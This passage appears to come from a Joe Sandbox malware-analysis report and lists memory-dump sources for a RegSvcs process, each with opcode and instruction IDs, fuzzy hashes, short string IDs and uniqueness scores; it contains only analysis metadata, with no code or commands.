                                                                                                                            • Opcode Fuzzy Hash: 0e28fc1df1d36a374aa0c67c1fc7b8922001f2df06a19f8d426e380117f5c383
                                                                                                                            • Instruction Fuzzy Hash: 48619D30A09101CBDB548B68DD98ABF76B2FB85305FA4C66BD41EAB295C7348C81EB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: JXr
                                                                                                                            • API String ID: 0-3088851973
                                                                                                                            • Opcode ID: 26301cf9e280f653edf3552caecd992ed20a34bfd47789d0db26c30ca5cfe418
                                                                                                                            • Instruction ID: a372b940a4e230a8ec9fea9a3a4cd46d10a8580bfa0816315fda27231cf1d25b
                                                                                                                            • Opcode Fuzzy Hash: 26301cf9e280f653edf3552caecd992ed20a34bfd47789d0db26c30ca5cfe418
                                                                                                                            • Instruction Fuzzy Hash: 5861AF71E04A59CFDF90CB68C884BA9BBF1BF45300F15C166E546DB249E7B4D841CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q
                                                                                                                            • API String ID: 0-1007455737
                                                                                                                            • Opcode ID: 6f9d59e349250d37877e961ea3214ffb5f969069eec485dd015b7d0a42a6d7be
                                                                                                                            • Instruction ID: 8d8cbb8d2c246754d9215fb9748979925a373475a7906abfa6b1c59b697e5f67
                                                                                                                            • Opcode Fuzzy Hash: 6f9d59e349250d37877e961ea3214ffb5f969069eec485dd015b7d0a42a6d7be
                                                                                                                            • Instruction Fuzzy Hash: CC51AC34A09101DBDB148B69DD98BBFB7B2EB88305F60C56BD50F9B284D7349882DB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: JXr
                                                                                                                            • API String ID: 0-3088851973
                                                                                                                            • Opcode ID: 51b74bf62877e46ea31b4403174a622cbc5d13768ead5fcd13b8fa0dc77080f4
                                                                                                                            • Instruction ID: ed28e1b08f173d13294ef5322f060f0ff0405ac11141e0a66ba8f3b5328967e8
                                                                                                                            • Opcode Fuzzy Hash: 51b74bf62877e46ea31b4403174a622cbc5d13768ead5fcd13b8fa0dc77080f4
                                                                                                                            • Instruction Fuzzy Hash: B651BF30A04A14CFEF84DF58C464B797BB3EB46305F19C16AE0169B29DD774E985CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: XYr
                                                                                                                            • API String ID: 0-3412241957
                                                                                                                            • Opcode ID: b4b6d5e12054ea6a9ae13c5e35ab1f2feaebbb1ada231792a30773cff832959f
                                                                                                                            • Instruction ID: 604ca5c862380f052ad4fa45296ded1a0d0571d6d6db9bff4cab1324a3b434ab
                                                                                                                            • Opcode Fuzzy Hash: b4b6d5e12054ea6a9ae13c5e35ab1f2feaebbb1ada231792a30773cff832959f
                                                                                                                            • Instruction Fuzzy Hash: 5D31CE2054FFC81FD30387709E26A55BFB9BF42204F59C4FED9854A8A3C194459BC752
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q
                                                                                                                            • API String ID: 0-1007455737
                                                                                                                            • Opcode ID: 29dcea2783abedaea6caeb9b414bcf468dbca21d71b0401940c4406f6d3c60c6
                                                                                                                            • Instruction ID: 4c58c97a061d2edf933bff920a53cf1001428d41e85eac1fc32a317c7d17fb87
                                                                                                                            • Opcode Fuzzy Hash: 29dcea2783abedaea6caeb9b414bcf468dbca21d71b0401940c4406f6d3c60c6
                                                                                                                            • Instruction Fuzzy Hash: 1541C430E04115CFEF948FA5C4107BAB7B2FB85316F9DC276D0529B299E2349885CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .5uq
                                                                                                                            • API String ID: 0-910421107
                                                                                                                            • Opcode ID: f27f9038b828566d7ea1faf85bdf4b6bb46f15e9be6358c134c1bb4a1a454393
                                                                                                                            • Instruction ID: ee2aded344288b90c20e28dac9c9d5bbdb6d9dc51eb30333e0b4545ff63c077c
                                                                                                                            • Opcode Fuzzy Hash: f27f9038b828566d7ea1faf85bdf4b6bb46f15e9be6358c134c1bb4a1a454393
                                                                                                                            • Instruction Fuzzy Hash: 72114C70E04218CFEB61CB65CA54BEDBBF6AB88301F1081A9E54DA7256DB759E80CF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .5uq
                                                                                                                            • API String ID: 0-910421107
                                                                                                                            • Opcode ID: 83449ad3cd323fafe0744ab61bc6cba12cd59818b2e76b68a3f100d224d1273b
                                                                                                                            • Instruction ID: 6093142b1a11576f475783073305e8573bd9ef253354555365f19f90d87c6556
                                                                                                                            • Opcode Fuzzy Hash: 83449ad3cd323fafe0744ab61bc6cba12cd59818b2e76b68a3f100d224d1273b
                                                                                                                            • Instruction Fuzzy Hash: 9A113A70A04218CFDB60CB64CE54BEDBBB6EB84301F1081A5E549AB255D7759E80CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .5uq
                                                                                                                            • API String ID: 0-910421107
                                                                                                                            • Opcode ID: 9c7af00626b61170f2994e9e60ecf7e81e5a21876340c26de76344e90445642c
                                                                                                                            • Instruction ID: 2c49c1d7eb65085a830f607cb4ccccec766dc582936a4f3fbc07c2e16b187e9b
                                                                                                                            • Opcode Fuzzy Hash: 9c7af00626b61170f2994e9e60ecf7e81e5a21876340c26de76344e90445642c
                                                                                                                            • Instruction Fuzzy Hash: 48112A70E04218CFEB60CB64CD54BEDBBB5FB88301F2081A9E559AB296C7759E80CF51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $]q
                                                                                                                            • API String ID: 0-1007455737
                                                                                                                            • Opcode ID: dc0aa11805446dd9534c5275c8f4a8d398172ab81863d97ef21873e1afb9eb55
                                                                                                                            • Instruction ID: 608a511e7a7d194161fd01ac373b13a11a287879da02f87cfd15335728732515
                                                                                                                            • Opcode Fuzzy Hash: dc0aa11805446dd9534c5275c8f4a8d398172ab81863d97ef21873e1afb9eb55
                                                                                                                            • Instruction Fuzzy Hash: 21F0C974E5112ADFFB69CA64C944BACB3F2FB04310F1084A9E809A7242C774AD81CFA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ^Yr
                                                                                                                            • API String ID: 0-490425656
                                                                                                                            • Opcode ID: 7d6e0047fc653d72e00981134f2c731c4decd158eb38ddb59ff5f9fa5090ec63
                                                                                                                            • Instruction ID: fb3b964753c7ded3e5a8fc27fc8fd3932fda61348d24aa2c011b38c6034ac5bd
                                                                                                                            • Opcode Fuzzy Hash: 7d6e0047fc653d72e00981134f2c731c4decd158eb38ddb59ff5f9fa5090ec63
                                                                                                                            • Instruction Fuzzy Hash: FAC080301445478FE3169774E819AD177B5FF84324B15C7B5405D0A469DB794847CB41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fa79355f8341a952bae8b6123326fdd31d59aa3563c26e728cb09db13de3195f
                                                                                                                            • Instruction ID: 69e84556395a2caa1fdca83620881ea08f5d77fb2f555b21b38af38725b8bd57
                                                                                                                            • Opcode Fuzzy Hash: fa79355f8341a952bae8b6123326fdd31d59aa3563c26e728cb09db13de3195f
                                                                                                                            • Instruction Fuzzy Hash: 53B10271E042C6ABFFF18B61C840ABDFBA2EB52FF1BEDC159D0415A541D33499028B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0cb0c084d040b67489507e88ec0080bdc2e8b70597db32e4392dc2bb5ce1cb72
                                                                                                                            • Instruction ID: 7876a30fc531622bb5a45774a20cac843181bcf68dfd4a23544e1cd31d385893
                                                                                                                            • Opcode Fuzzy Hash: 0cb0c084d040b67489507e88ec0080bdc2e8b70597db32e4392dc2bb5ce1cb72
                                                                                                                            • Instruction Fuzzy Hash: 0AD14034A11314DFCB95DF69D994AADB7B2FF88311F108269E506AB3A1CB39DC41CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6bb02caa225e305a9ecbcd9f7aa18f282e96b957b1d1b6b62dd85575d33bc9d0
                                                                                                                            • Instruction ID: 6752755415a574ef4add2e99618b58f574e2c782179bf3d79d1ba0e4f9b146a5
                                                                                                                            • Opcode Fuzzy Hash: 6bb02caa225e305a9ecbcd9f7aa18f282e96b957b1d1b6b62dd85575d33bc9d0
                                                                                                                            • Instruction Fuzzy Hash: 16D1D2389083C55ED7628F78C8245E9FFF0AF47200B289ACDD4E49B252D63055C2EFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 72b699e0a9e68566dec073b4a9c65e4d554229bdfaf8c33f0f416b9dadb902f8
                                                                                                                            • Instruction ID: 052c1fd070e62bd6146306fce6810709551666625c136e70344c7b3f003d3370
                                                                                                                            • Opcode Fuzzy Hash: 72b699e0a9e68566dec073b4a9c65e4d554229bdfaf8c33f0f416b9dadb902f8
                                                                                                                            • Instruction Fuzzy Hash: 07A1BE35909150EFD3118B18CC54BBD7BB2ABA1311F29C5A7D05E9F2A2D3398D82EB53
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b1db83ccb219cce0d2833c1d9e16951e0d282a9ee7e43fda381d583a3da9235e
                                                                                                                            • Instruction ID: 71907c832def50f097ece2186a5e12b358488b5ccef9ab56313f09bc13e40acb
                                                                                                                            • Opcode Fuzzy Hash: b1db83ccb219cce0d2833c1d9e16951e0d282a9ee7e43fda381d583a3da9235e
                                                                                                                            • Instruction Fuzzy Hash: 7551032151A241FAF7D4CBF09809885F7EAAF87380B0AB099C669BF6F7D620C411C375
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b7f1a4166131d3a120346e1f0714b282fa54cc2657b0fbd1cfcc82bc36dc2c84
                                                                                                                            • Instruction ID: 3989624c95a9f0f8fe7593efc2865f7522b0a54dd1ed929b6aaaaa403c5e0646
                                                                                                                            • Opcode Fuzzy Hash: b7f1a4166131d3a120346e1f0714b282fa54cc2657b0fbd1cfcc82bc36dc2c84
                                                                                                                            • Instruction Fuzzy Hash: 7C71B235E08111EBE3208B14CC54B7D77B2ABE5311F29C5A7D01E5F292E2398D82AB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c415857898e79ba0e5db29f16ee3116577bef6c7b9956f20090bca6629b896ba
                                                                                                                            • Instruction ID: 0876abc32931880836be199e280be52668947926d94b8559c9ad11784ec47d22
                                                                                                                            • Opcode Fuzzy Hash: c415857898e79ba0e5db29f16ee3116577bef6c7b9956f20090bca6629b896ba
                                                                                                                            • Instruction Fuzzy Hash: 8271A235D08111EBD7208B14CC54BBD77B2ABE5311F29C5A7D01E5B292E3798D82EB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ac21633817ad3c6de64b403ed5b8cd46a217bd27338946d2a4dea43905677555
                                                                                                                            • Instruction ID: fea80c151310755283bdf6f41c14fc1cafc89c3bf921a51055d6a9a05e8eeb3c
                                                                                                                            • Opcode Fuzzy Hash: ac21633817ad3c6de64b403ed5b8cd46a217bd27338946d2a4dea43905677555
                                                                                                                            • Instruction Fuzzy Hash: 6471B135E08111EBE3208B14CC54BBD77B2ABE5311F29C5A7D01E5F292D2798D82AB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4bb9dbf1a39abff851dce93bbb326477029216f97250d62fd02ce82cb402f8d1
                                                                                                                            • Instruction ID: 4967e0c42f9fc7acc6b9ed7008e36d32b1e94d21ab0fd07fbf8bc242be06e2d5
                                                                                                                            • Opcode Fuzzy Hash: 4bb9dbf1a39abff851dce93bbb326477029216f97250d62fd02ce82cb402f8d1
                                                                                                                            • Instruction Fuzzy Hash: A361B135E08111EBE3208B14CC54BBD77B2ABE5311F29C5A7D01E5F292D2398D82AB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b2b10209a511c7bbbf4418ecc93c44da07162a0161415357ab1f7af54495e5e7
                                                                                                                            • Instruction ID: 91e3b79caafc61a75eb2e5047dee894ee4fc579cc59d9610256bdad871d29a4e
                                                                                                                            • Opcode Fuzzy Hash: b2b10209a511c7bbbf4418ecc93c44da07162a0161415357ab1f7af54495e5e7
                                                                                                                            • Instruction Fuzzy Hash: 9D717BB1E00249DFDF10DFA9C88179EBBF2BF88304F14C129E419AB254DB759842CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e2c392076fcdfbf08edb933fa91e9f1f71d665044c73e03928aafdd656287f5e
                                                                                                                            • Instruction ID: b4bfacae84f1b45d9994909c128924997898a5eef2f213821d2a5358ffaf4bea
                                                                                                                            • Opcode Fuzzy Hash: e2c392076fcdfbf08edb933fa91e9f1f71d665044c73e03928aafdd656287f5e
                                                                                                                            • Instruction Fuzzy Hash: 6741F06094FBC85FD3039B749E666547FB5BF42300F19C4EBC4858B893C694498BC7A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e7cd8f4db7d31f204520cb7879238e2b92059b139a1bb26f04337214411ac832
                                                                                                                            • Instruction ID: 2601a8f012746df497bc6ac6a518b61b6c3fb3dba06e5fde99161d37412d823f
                                                                                                                            • Opcode Fuzzy Hash: e7cd8f4db7d31f204520cb7879238e2b92059b139a1bb26f04337214411ac832
                                                                                                                            • Instruction Fuzzy Hash: AF419D35B05101CFF7908AA8D440B7EB7E6EB85301FA4C926E506CB6D5EB34D845C7E2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d8fc4c98f4e88d89c42e2edf2064659a7855ee632ff36063bd743ebc583e19ab
                                                                                                                            • Instruction ID: ed8f51dfcbfa4769cf09fd23f8baf15d8040b402d77426dda624a1a24343396b
                                                                                                                            • Opcode Fuzzy Hash: d8fc4c98f4e88d89c42e2edf2064659a7855ee632ff36063bd743ebc583e19ab
                                                                                                                            • Instruction Fuzzy Hash: 0F416F74D0A284CFDB84CFA9C940AADBFF1EB4A255F08C1AAD255DB252D235C940CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 75657bf3936ad72a8baf7419247f9ba715ae9c8979aab377b4254d61541fc5e4
                                                                                                                            • Instruction ID: 645f6e25cc7df6e604062fa75f39f4d1d681cb7e2214a50507314f8c71749690
                                                                                                                            • Opcode Fuzzy Hash: 75657bf3936ad72a8baf7419247f9ba715ae9c8979aab377b4254d61541fc5e4
                                                                                                                            • Instruction Fuzzy Hash: F651F331D14B1A8ADB50EB68C8446A9F7B1FF99300F11D79AE45C67160FF70AAD4CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4a18322998ca95af1b74fd59dbdfb46c1eeea84066289175e271810ed370c7d3
                                                                                                                            • Instruction ID: 286897cb025f3e174ba51defc6d9f2ef8f72808039de04b7ba52025d3231538e
                                                                                                                            • Opcode Fuzzy Hash: 4a18322998ca95af1b74fd59dbdfb46c1eeea84066289175e271810ed370c7d3
                                                                                                                            • Instruction Fuzzy Hash: 5851E431D14B5A8EDB10EF68C8906D9F7B1FF9A300F10C69AE44D67255EB70AAC5CB81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3243730276.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_a70000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1395c2a3a21a6f339db091c92c44ecf24367b38072f6b4ff8d8ed01bc45a3e62
                                                                                                                            • Instruction ID: ae5e4378387358ac70ad9ddb3174a9d440bf02396d54ae5dc906f548222ea648
                                                                                                                            • Opcode Fuzzy Hash: 1395c2a3a21a6f339db091c92c44ecf24367b38072f6b4ff8d8ed01bc45a3e62
                                                                                                                            • Instruction Fuzzy Hash: B341B130A081A5CFC714DB698D446BABFF1BB8D352F19C1E6D45ADB285E338C940DBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3313747501.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_68a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5ae7e3d4ea5b1ce1bf2c2ccd445827fb5cef3ade53833f1b6fa7f312190899f7
                                                                                                                            • Instruction ID: 30cebcedb4966b875c271621f25916e7c2315de7100c4709e935544a167b101a
                                                                                                                            • Opcode Fuzzy Hash: 5ae7e3d4ea5b1ce1bf2c2ccd445827fb5cef3ade53833f1b6fa7f312190899f7
                                                                                                                            • Instruction Fuzzy Hash: AB41A03850A2C59EE7629F28C4646ACFFB0EF46314F6459D8C8E49B253C63059C6EF61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b75f95c60152632dbbd7c17158b80a4253ba4cd0e81661fc1528b472daec1641
                                                                                                                            • Instruction ID: 9e0695cbedcaa112f94a20848172062947ac53fc0c1b70982e463b31c8f8f28b
                                                                                                                            • Opcode Fuzzy Hash: b75f95c60152632dbbd7c17158b80a4253ba4cd0e81661fc1528b472daec1641
                                                                                                                            • Instruction Fuzzy Hash: 0F419334E05344CFFB649F54C4047BDBBB2EB81300F48C27AE1269B292C77599818F82
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.3310174991.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_6770000_RegSvcs.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c6786fd73425f19ef49cc33f8fda3102f593ed2681a7ae6c6ace7ec7a9654d67
                                                                                                                            • Instruction ID: d74eddfc98b4ab92ce4f22256e56966cd028d832feb69f0964841f3caf6d272d
                                                                                                                            • Opcode Fuzzy Hash: c6786fd73425f19ef49cc33f8fda3102f593ed2681a7ae6c6ace7ec7a9654d67
